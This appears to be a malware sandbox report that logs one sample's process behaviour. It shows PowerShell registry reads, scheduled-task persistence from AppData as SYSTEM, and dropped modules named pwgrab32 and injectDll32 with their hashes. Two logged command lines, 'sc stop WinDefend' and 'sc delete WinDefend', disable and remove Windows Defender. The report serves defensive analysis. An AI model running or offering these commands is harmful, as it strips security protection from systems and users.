| Write | CONOUT$ | size = 1 |
|
1 | |
| Write | CONOUT$ | size = 57 |
|
1 | |
| Write | CONOUT$ | size = 1 |
|
1 | |
| Write | CONOUT$ | size = 79 |
|
1 | |
| Write | CONOUT$ | size = 1 |
|
1 | |
| Write | CONOUT$ | size = 25 |
|
1 | |
| Write | CONOUT$ | size = 1 |
|
1 | |
| Write | CONOUT$ | size = 54 |
|
1 | |
| Write | CONOUT$ | size = 1 |
|
1 | |
| Write | CONOUT$ | size = 1 |
|
2 |
Registry (194)
| Operation | Key | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Open Key | HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1 | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Session Manager\Environment | - |
|
1 | |
| Open Key | HKEY_CURRENT_USER\Environment | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\PowerShell\1\ShellIds\Microsoft.PowerShell | - |
|
2 | |
| Open Key | HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine | - |
|
2 | |
| Open Key | HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine | - |
|
9 | |
| Open Key | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Application | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Application\PowerShell | - |
|
4 | |
| Open Key | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\HardwareEvents | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\HardwareEvents\PowerShell | - |
|
4 | |
| Open Key | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Internet Explorer | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Internet Explorer\PowerShell | - |
|
4 | |
| Open Key | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Key Management Service | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Key Management Service\PowerShell | - |
|
4 | |
| Open Key | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Media Center | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Media Center\PowerShell | - |
|
4 | |
| Open Key | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\OAlerts | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\OAlerts\PowerShell | - |
|
4 | |
| Open Key | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Security | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Security\PowerShell | - |
|
4 | |
| Open Key | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\System | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\System\PowerShell | - |
|
4 | |
| Open Key | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Windows PowerShell | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Windows PowerShell\PowerShell | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Application | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\HardwareEvents | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Internet Explorer | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Key Management Service | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Media Center | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\OAlerts | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Security | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\System | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Windows PowerShell | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Windows PowerShell\PowerShell | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Application | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\HardwareEvents | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Internet Explorer | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Key Management Service | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Media Center | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\OAlerts | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Security | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\System | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Windows PowerShell | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Windows PowerShell\PowerShell | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Application | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\HardwareEvents | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Internet Explorer | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Key Management Service | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Media Center | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\OAlerts | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Security | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\System | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Windows PowerShell | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Windows PowerShell\PowerShell | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine | - |
|
2 | |
| Open Key | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\PowerShell\1\ShellIds | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\PowerShell\1\ShellIds | - |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine | value_name = ApplicationBase, data = 0, type = REG_SZ |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine | value_name = ApplicationBase, data = C:\Windows\System32\WindowsPowerShell\v1.0, type = REG_SZ |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Session Manager\Environment | value_name = PSMODULEPATH, data = 0, type = REG_EXPAND_SZ |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Session Manager\Environment | value_name = PSMODULEPATH, data = %SystemRoot%\system32\WindowsPowerShell\v1.0\Modules\, type = REG_EXPAND_SZ |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Environment | value_name = PSMODULEPATH, type = REG_NONE |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\PowerShell\1\ShellIds\Microsoft.PowerShell | value_name = path, data = 0, type = REG_SZ |
|
4 | |
| Read Value | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\PowerShell\1\ShellIds\Microsoft.PowerShell | value_name = path, data = C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, type = REG_SZ |
|
2 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine | value_name = ApplicationBase, data = 0, type = REG_SZ |
|
2 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine | value_name = ApplicationBase, data = C:\Windows\System32\WindowsPowerShell\v1.0, type = REG_SZ |
|
2 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine | value_name = ApplicationBase, data = 0, type = REG_SZ |
|
9 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine | value_name = ApplicationBase, data = C:\Windows\System32\WindowsPowerShell\v1.0, type = REG_SZ |
|
9 | |
| Read Value | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN | value_name = StackVersion, data = 0, type = REG_SZ |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN | value_name = StackVersion, data = 2.0, type = REG_SZ |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN | value_name = StackVersion, data = 0, type = REG_SZ |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN | value_name = StackVersion, data = 2.0, type = REG_SZ |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine | value_name = ApplicationBase, data = 0, type = REG_SZ |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine | value_name = ApplicationBase, data = C:\Windows\System32\WindowsPowerShell\v1.0, type = REG_SZ |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine | value_name = ApplicationBase, data = 0, type = REG_SZ |
|
2 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine | value_name = ApplicationBase, data = C:\Windows\System32\WindowsPowerShell\v1.0, type = REG_SZ |
|
2 | |
| Read Value | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\PowerShell\1\ShellIds | value_name = PipelineMaxStackSizeMB, type = REG_NONE |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\PowerShell\1\ShellIds | value_name = PipelineMaxStackSizeMB, type = REG_NONE |
|
1 | |
| Enumerate Keys | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog | - |
|
1 | |
| Enumerate Keys | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog | - |
|
1 | |
| Enumerate Keys | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog | - |
|
1 | |
| Enumerate Keys | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog | - |
|
1 | |
| Enumerate Keys | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog | - |
|
1 | |
| Enumerate Keys | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog | - |
|
1 | |
| Enumerate Keys | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog | - |
|
1 | |
| Enumerate Keys | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog | - |
|
1 | |
| Enumerate Keys | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog | - |
|
1 | |
| Enumerate Keys | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog | - |
|
1 | |
| Enumerate Keys | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog | - |
|
1 | |
| Enumerate Keys | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog | - |
|
1 | |
| Enumerate Keys | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog | - |
|
1 | |
| Enumerate Keys | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog | - |
|
1 | |
| Enumerate Keys | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog | - |
|
1 | |
| Enumerate Keys | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog | - |
|
1 | |
| Enumerate Keys | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog | - |
|
1 | |
| Enumerate Keys | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog | - |
|
1 | |
| Enumerate Keys | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog | - |
|
1 | |
| Enumerate Keys | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog | - |
|
1 | |
| Enumerate Keys | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog | - |
|
1 | |
| Enumerate Keys | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog | - |
|
1 | |
| Enumerate Keys | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog | - |
|
1 | |
| Enumerate Keys | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog | - |
|
1 | |
| Enumerate Keys | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog | - |
|
1 | |
| Enumerate Keys | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog | - |
|
1 | |
| Enumerate Keys | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog | - |
|
1 | |
| Enumerate Keys | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog | - |
|
1 | |
| Enumerate Keys | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog | - |
|
1 | |
| Enumerate Keys | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog | - |
|
1 | |
| Enumerate Keys | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog | - |
|
1 | |
| Enumerate Keys | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog | - |
|
1 | |
| Enumerate Keys | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog | - |
|
1 | |
| Enumerate Keys | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog | - |
|
1 | |
| Enumerate Keys | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog | - |
|
1 | |
| Enumerate Keys | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog | - |
|
1 | |
| Enumerate Values | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN | - |
|
1 | |
| Enumerate Values | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN | - |
|
1 | |
| Enumerate Values | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN | - |
|
1 | |
| Enumerate Values | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN | - |
|
1 | |
| Enumerate Values | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN | - |
|
1 | |
| Enumerate Values | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN | - |
|
1 | |
| Get Key Info | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN | - |
|
1 | |
| Get Key Info | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN | - |
|
1 | |
| Get Key Info | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog | - |
|
1 | |
| Get Key Info | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog | - |
|
1 | |
| Get Key Info | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog | - |
|
1 | |
| Get Key Info | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog | - |
|
1 |
Module (1)
| Operation | Module | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Get Filename | - | process_name = c:\windows\system32\windowspowershell\v1.0\powershell.exe, file_name_orig = C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, size = 2048 |
|
1 |
User (11)
| Operation | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|
| Lookup Privilege | privilege = SeDebugPrivilege, luid = 20 |
|
1 | |
| Get Username | user_name_out = 2XC7u663GxWc |
|
10 |
System (6)
| Operation | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|
| Get Info | type = Operating System |
|
4 | |
| Get Info | type = SYSTEM_PROCESS_INFORMATION |
|
1 | |
| Get Info | type = Hardware Information |
|
1 |
Environment (125)
| Operation | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|
| Get Environment String | name = MshEnableTrace |
|
116 | |
| Get Environment String | name = PSMODULEPATH, result_out = C:\Windows\system32\WindowsPowerShell\v1.0\Modules\ |
|
1 | |
| Get Environment String | name = HOMEDRIVE, result_out = C: |
|
1 | |
| Get Environment String | name = HOMEPATH, result_out = \Users\2XC7u663GxWc |
|
1 | |
| Get Environment String | name = HomeDrive, result_out = C: |
|
1 | |
| Get Environment String | name = HomePath, result_out = \Users\2XC7u663GxWc |
|
1 | |
| Get Environment String | name = PATHEXT, result_out = .COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC |
|
1 | |
| Get Environment String | name = PATH |
|
1 | |
| Get Environment String | name = PATH, result_out = C:\ProgramData\Oracle\Java\javapath;C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\ |
|
1 | |
| Set Environment String | name = PSMODULEPATH, value = C:\Users\2XC7u663GxWc\Documents\WindowsPowerShell\Modules;C:\Windows\system32\WindowsPowerShell\v1.0\Modules\ |
|
1 |
Process #20: sc.exe
10
0
| Information | Value |
|---|---|
| ID | #20 |
| File Name | c:\windows\system32\sc.exe |
| Command Line | sc stop WinDefend |
| Initial Working Directory | C:\Windows\system32\ |
| Monitor | Start Time: 00:00:55, Reason: Child Process |
| Unmonitor | End Time: 00:00:57, Reason: Self Terminated |
| Monitor Duration | 00:00:01 |
OS Process Information
| Information | Value |
|---|---|
| PID | 0x83c |
| Parent PID | 0xfd8 (c:\windows\system32\cmd.exe) |
| Bitness | 32-bit |
| Is Created or Modified Executable |
|
| Integrity Level | High (Elevated) |
| Username | ZGW5TDPU\2XC7u663GxWc |
| Enabled Privileges | SeChangeNotifyPrivilege, SeImpersonatePrivilege, SeCreateGlobalPrivilege |
| Thread IDs |
0x
134
0x
8C0
|
Host Behavior
File (3)
| Operation | Filename | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Get Info | STD_OUTPUT_HANDLE | type = file_type |
|
1 | |
| Open | STD_OUTPUT_HANDLE | - |
|
1 | |
| Write | STD_OUTPUT_HANDLE | size = 349 |
|
1 |
Module (1)
| Operation | Module | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Get Handle | c:\windows\system32\sc.exe | base_address = 0xec0000 |
|
1 |
Service (3)
| Operation | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|
| Control | service_name = WinDefend |
|
1 | |
| Open | database_name = SERVICES_ACTIVE_DATABASE |
|
1 | |
| Open Manager | database_name = SERVICES_ACTIVE_DATABASE |
|
1 |
System (3)
| Operation | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|
| Get Time | type = System Time, time = 1627-02-24 06:58:31 (UTC) |
|
1 | |
| Get Time | type = Ticks, time = 10905749 |
|
1 | |
| Get Time | type = Performance Ctr, time = 12979045394 |
|
1 |
Process #21: sc.exe
10
0
| Information | Value |
|---|---|
| ID | #21 |
| File Name | c:\windows\system32\sc.exe |
| Command Line | sc delete WinDefend |
| Initial Working Directory | C:\Windows\system32\ |
| Monitor | Start Time: 00:00:56, Reason: Child Process |
| Unmonitor | End Time: 00:00:57, Reason: Self Terminated |
| Monitor Duration | 00:00:01 |
OS Process Information
| Information | Value |
|---|---|
| PID | 0x8e4 |
| Parent PID | 0xffc (c:\windows\system32\cmd.exe) |
| Bitness | 32-bit |
| Is Created or Modified Executable |
|
| Integrity Level | High (Elevated) |
| Username | ZGW5TDPU\2XC7u663GxWc |
| Enabled Privileges | SeChangeNotifyPrivilege, SeImpersonatePrivilege, SeCreateGlobalPrivilege |
| Thread IDs |
0x
8D0
0x
8D4
|
Host Behavior
File (3)
| Operation | Filename | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Get Info | STD_OUTPUT_HANDLE | type = file_type |
|
1 | |
| Open | STD_OUTPUT_HANDLE | - |
|
1 | |
| Write | STD_OUTPUT_HANDLE | size = 28 |
|
1 |
Module (1)
| Operation | Module | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Get Handle | c:\windows\system32\sc.exe | base_address = 0xb70000 |
|
1 |
Service (3)
| Operation | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|
| Delete | service_name = WinDefend |
|
1 | |
| Open | database_name = SERVICES_ACTIVE_DATABASE |
|
1 | |
| Open Manager | database_name = SERVICES_ACTIVE_DATABASE |
|
1 |
System (3)
| Operation | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|
| Get Time | type = System Time, time = 1627-02-24 06:58:32 (UTC) |
|
1 | |
| Get Time | type = Ticks, time = 10906326 |
|
1 | |
| Get Time | type = Performance Ctr, time = 13036544912 |
|
1 |
Process #23: taskeng.exe
0
0
| Information | Value |
|---|---|
| ID | #23 |
| File Name | c:\windows\system32\taskeng.exe |
| Command Line | taskeng.exe {E6ACF615-28B7-4794-9E2D-7B8DC4832D2F} S-1-5-18:NT AUTHORITY\System:Service: |
| Initial Working Directory | C:\Windows\system32\ |
| Monitor | Start Time: 00:01:22, Reason: Created Scheduled Job |
| Unmonitor | End Time: 00:04:16, Reason: Terminated by Timeout |
| Monitor Duration | 00:02:54 |
| Remark | No high level activity detected in monitored regions |
OS Process Information
| Information | Value |
|---|---|
| PID | 0x914 |
| Parent PID | 0x34c (Unknown) |
| Bitness | 32-bit |
| Is Created or Modified Executable |
|
| Integrity Level | System (Elevated) |
| Username | NT AUTHORITY\SYSTEM |
| Enabled Privileges | SeLockMemoryPrivilege, SeTcbPrivilege, SeSystemProfilePrivilege, SeProfileSingleProcessPrivilege, SeIncreaseBasePriorityPrivilege, SeCreatePagefilePrivilege, SeCreatePermanentPrivilege, SeDebugPrivilege, SeAuditPrivilege, SeChangeNotifyPrivilege, SeImpersonatePrivilege, SeCreateGlobalPrivilege, SeIncreaseWorkingSetPrivilege, SeTimeZonePrivilege, SeCreateSymbolicLinkPrivilege |
| Thread IDs |
0x
91C
0x
920
0x
188
0x
15C
0x
12C
0x
138
0x
1E4
|
Process #24: tadiapce.exe
17003
150
| Information | Value |
|---|---|
| ID | #24 |
| File Name | c:\users\2xc7u663gxwc\appdata\roaming\chromedata\tadiapce.exe |
| Command Line | C:\Users\2XC7u663GxWc\AppData\Roaming\chromedata\tadiapce.exe |
| Initial Working Directory | C:\Windows\system32\ |
| Monitor | Start Time: 00:01:23, Reason: Child Process |
| Unmonitor | End Time: 00:04:16, Reason: Terminated by Timeout |
| Monitor Duration | 00:02:53 |
OS Process Information
| Information | Value |
|---|---|
| PID | 0x214 |
| Parent PID | 0x914 (c:\windows\system32\taskeng.exe) |
| Bitness | 32-bit |
| Is Created or Modified Executable |
|
| Integrity Level | System (Elevated) |
| Username | NT AUTHORITY\SYSTEM |
| Enabled Privileges | SeLockMemoryPrivilege, SeTcbPrivilege, SeSystemProfilePrivilege, SeProfileSingleProcessPrivilege, SeIncreaseBasePriorityPrivilege, SeCreatePagefilePrivilege, SeCreatePermanentPrivilege, SeDebugPrivilege, SeAuditPrivilege, SeChangeNotifyPrivilege, SeImpersonatePrivilege, SeCreateGlobalPrivilege, SeIncreaseWorkingSetPrivilege, SeTimeZonePrivilege, SeCreateSymbolicLinkPrivilege |
| Thread IDs |
0x
264
0x
28C
0x
2AC
0x
348
0x
120
0x
930
0x
174
0x
990
0x
9E4
0x
230
0x
93C
0x
51C
0x
A38
0x
738
0x
510
0x
C18
0x
308
0x
20C
0x
150
0x
754
0x
D18
0x
D0C
0x
D08
0x
D20
0x
D10
0x
D2C
0x
658
0x
810
0x
D34
0x
B84
0x
B88
0x
A2C
0x
A40
0x
A10
0x
D44
0x
D48
0x
D80
0x
D88
0x
D7C
0x
DC0
0x
D78
0x
DB0
0x
DB8
0x
D98
0x
D8C
0x
DAC
0x
D94
0x
D9C
0x
8EC
0x
BF0
0x
BEC
0x
BE8
0x
BDC
0x
DF8
0x
BA0
0x
BAC
0x
604
0x
680
0x
B0
0x
DE0
0x
DE8
0x
DEC
0x
E18
0x
E1C
0x
DF0
0x
DD4
0x
DD0
0x
E30
0x
DB4
0x
F50
0x
F60
0x
F44
0x
F54
0x
F58
|
Dropped Files
| Filename | File Size | Hash Values | YARA Match | Actions |
|---|---|---|---|---|
| settings.ini | 17.89 KB |
MD5:
ebbf1f31b6de4fc2b9de6c80494eeb39
SHA1: 14db29cd23f83a5de771a2cc6cbb41a0ef101b0f SHA256: 2d690ec2c6c859767a9dc29eaedc67c2de103037951494a3eeae6335bac4ec00 SSDeep: 384:f8ip6dC2AWGShPfXbM2ffBME5fNPLmEFqQ12TJPW:f8RdQW7PfXbM2fNvzFFn12TJPW |
|
|
| C:\Users\2XC7u663GxWc\AppData\Roaming\chromedata\Data\systeminfo32 | 16.17 KB |
MD5:
3a8f710f2a7c79c6829e9682af59040d
SHA1: b9bf965045b3ddc6f332bc36e9cdd52ca03d8b7f SHA256: 0d7fec5789664c377667a89fe1a2098fb201014bafdf475d002a57c96689eb72 SSDeep: 384:/IpVB1xeH7b8hOaGjM6wM9hDUxYoxOoNgkR8UQrra1bVTDnDpPecSKT:/IYbb1xb91COygkRDk6 |
|
|
| C:\Users\2XC7u663GxWc\AppData\Roaming\chromedata\Data\injectDll32 | 578.94 KB |
MD5:
cbf6993507c3ce333977627d5dd80825
SHA1: 9c100fcbb95c3620cadfaf2eec5e63b2660585b0 SHA256: 08feb5be3c64dee2d43cab334ca37db9214c8d8f5acefd17487d60e38d2b8475 SSDeep: 12288:lWRNtoO/UtADpB/0C8EM3n0B8gmJBxx1B4DEmbmuDd6AIKJtW6l/Ve3kUzJ:lOogUtAf0YM388gmJBv1mDEGJIAe0Vo |
|
|
| C:\Users\2XC7u663GxWc\AppData\Roaming\chromedata\Data\pwgrab32 | 1.07 MB |
MD5:
30e83e96a2ca2bd824fc6683557d0754
SHA1: e7b8b2235afa4185291be09b938ab84a3f56e507 SHA256: 070f2bb875507aee0cad7a540382f0ff5c18fa4249f6e7729f5530be5843f6e0 SSDeep: 24576:s0OCisGaLSGuZas9pjTeDfHn65brnW0+rflbbi:DOCioLROasTIfiYjlbm |
|
|
| settings.ini | 18.08 KB |
MD5:
bc40d11cfc6d5938ca3ca99d4847e0c7
